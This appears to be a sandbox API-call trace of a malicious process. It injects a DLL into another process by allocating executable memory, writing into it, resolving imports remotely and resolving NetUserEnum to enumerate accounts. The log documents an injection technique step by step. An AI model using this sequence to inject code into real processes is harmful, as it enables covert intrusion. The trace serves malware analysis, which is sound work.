	[0153.894] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.895] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.895] ResetEvent (hEvent=0x268) returned 1
	[0153.895] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.895] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.895] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.895] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.895] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.896] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040b4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.896] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.896] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.896] lstrlenA (lpString="??1type_info@@UAE@XZ") returned 20
	[0153.896] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.896] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0412*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0412*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0153.897] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.897] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.897] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.897] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.897] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.897] ResetEvent (hEvent=0x268) returned 1
	[0153.897] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.898] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.898] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.898] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.898] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.898] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040b8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.898] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.898] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.898] lstrlenA (lpString="_vsnwprintf") returned 11
	[0153.899] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.899] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d03d8*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d03d8*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0153.899] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.899] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.899] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.899] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.899] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.900] ResetEvent (hEvent=0x268) returned 1
	[0153.900] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.900] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.900] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.900] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.900] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.900] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040bc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.901] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.901] lstrlenA (lpString="??3@YAXPAX@Z") returned 12
	[0153.901] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.901] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d03f6*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d03f6*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0153.901] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.901] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.901] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.901] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.902] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.902] ResetEvent (hEvent=0x268) returned 1
	[0153.902] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.902] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.903] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.903] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.903] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.903] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x100040c0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.903] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.903] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0153.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d0492, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0153.903] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d0492, cbMultiByte=-1, lpWideCharStr=0x23079d8, cchWideChar=12 | out: lpWideCharStr="SHLWAPI.dll") returned 12
	[0153.903] lstrlenW (lpString="SHLWAPI.dll") returned 11
	[0153.903] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.904] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x23079d8*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23079d8*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0153.904] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0153.904] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.904] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.904] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0153.904] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0153.905] ResetEvent (hEvent=0x268) returned 1
	[0153.905] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.906] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0153.906] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.906] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.906] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.906] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.906] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.906] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.906] lstrlenA (lpString="StrFormatByteSizeW") returned 18
	[0153.906] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.907] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d047e*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d047e*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0153.907] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.907] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.907] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.907] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.907] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.908] ResetEvent (hEvent=0x268) returned 1
	[0153.908] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.908] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.908] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.908] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.908] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.909] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004094, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.909] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.909] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0153.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d04c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0153.909] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d04c0, cbMultiByte=-1, lpWideCharStr=0x23079d8, cchWideChar=13 | out: lpWideCharStr="NETAPI32.dll") returned 13
	[0153.909] lstrlenW (lpString="NETAPI32.dll") returned 12
	[0153.909] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.909] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x23079d8*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23079d8*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0153.910] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0153.910] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.910] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.910] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0153.910] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0153.911] ResetEvent (hEvent=0x268) returned 1
	[0153.911] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.927] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0153.927] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.927] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.927] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.927] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.927] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.927] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.927] lstrlenA (lpString="NetUserEnum") returned 11
	[0153.927] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.927] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d04b4*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d04b4*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0153.928] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.928] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.928] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.928] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.928] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.929] ResetEvent (hEvent=0x268) returned 1
	[0153.929] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.930] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.930] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.931] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.931] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.931] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004074, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.931] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.931] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.931] lstrlenA (lpString="NetApiBufferFree") returned 16
	[0153.931] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.931] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d04a0*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d04a0*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0153.932] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.932] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.932] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.932] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.932] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.933] ResetEvent (hEvent=0x268) returned 1
	[0153.933] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.933] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.933] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.933] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.933] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.933] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004078, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.934] lstrcmpA (lpString1="Control", lpString2="Start") returned -1
	[0153.934] lstrcmpA (lpString1="Control", lpString2="Control") returned 0
	[0153.934] lstrcmpA (lpString1="FreeBuffer", lpString2="Start") returned -1
	[0153.934] lstrcmpA (lpString1="FreeBuffer", lpString2="Control") returned 1
	[0153.934] lstrcmpA (lpString1="FreeBuffer", lpString2="FreeBuffer") returned 0
	[0153.934] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Start") returned -1
	[0153.934] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Control") returned 1
	[0153.934] lstrcmpA (lpString1="JNI_OnLoad", lpString2="FreeBuffer") returned 1
	[0153.934] lstrcmpA (lpString1="JNI_OnLoad", lpString2="Release") returned -1
	[0153.934] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Start") returned -1
	[0153.934] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Control") returned 1
	[0153.934] lstrcmpA (lpString1="JNI_OnUnload", lpString2="FreeBuffer") returned 1
	[0153.934] lstrcmpA (lpString1="JNI_OnUnload", lpString2="Release") returned -1
	[0153.934] lstrcmpA (lpString1="Release", lpString2="Start") returned -1
	[0153.934] lstrcmpA (lpString1="Release", lpString2="Control") returned 1
	[0153.934] lstrcmpA (lpString1="Release", lpString2="FreeBuffer") returned 1
	[0153.934] lstrcmpA (lpString1="Release", lpString2="Release") returned 0
	[0153.934] lstrcmpA (lpString1="Start", lpString2="Start") returned 0
	[0153.934] VirtualProtectEx (in: hProcess=0x454, lpAddress=0x10001000, dwSize=0x2700, flNewProtect=0x20, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0153.935] VirtualProtectEx (in: hProcess=0x454, lpAddress=0x10004000, dwSize=0xdcc, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0153.935] VirtualProtectEx (in: hProcess=0x454, lpAddress=0x10005000, dwSize=0x3ec, flNewProtect=0x4, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0153.935] VirtualProtectEx (in: hProcess=0x454, lpAddress=0x10006000, dwSize=0x326, flNewProtect=0x2, lpflOldProtect=0x1286e4 | out: lpflOldProtect=0x1286e4*=0x4) returned 1
	[0153.935] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128650, nSize=0x70, lpNumberOfBytesRead=0x128630 | out: lpBuffer=0x128650*, lpNumberOfBytesRead=0x128630*=0x70) returned 1
	[0153.935] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.935] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.935] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x23079d8*, nSize=0x14, lpNumberOfBytesWritten=0x128628 | out: lpBuffer=0x23079d8*, lpNumberOfBytesWritten=0x128628*=0x14) returned 1
	[0153.936] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128650*, nSize=0x70, lpNumberOfBytesWritten=0x128628 | out: lpBuffer=0x128650*, lpNumberOfBytesWritten=0x128628*=0x70) returned 1
	[0153.936] ResetEvent (hEvent=0x268) returned 1
	[0153.936] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.936] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128650, nSize=0x70, lpNumberOfBytesRead=0x128628 | out: lpBuffer=0x128650*, lpNumberOfBytesRead=0x128628*=0x70) returned 1
	[0153.936] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.936] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.936] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22d3cc0) returned 1
	[0153.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128bbc | out: lpSystemTimeAsFileTime=0x128bbc*(dwLowDateTime=0x4586a200, dwHighDateTime=0x1d50a6a)) 
	[0153.937] lstrlenA (lpString="systeminfo32") returned 12
	[0153.937] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
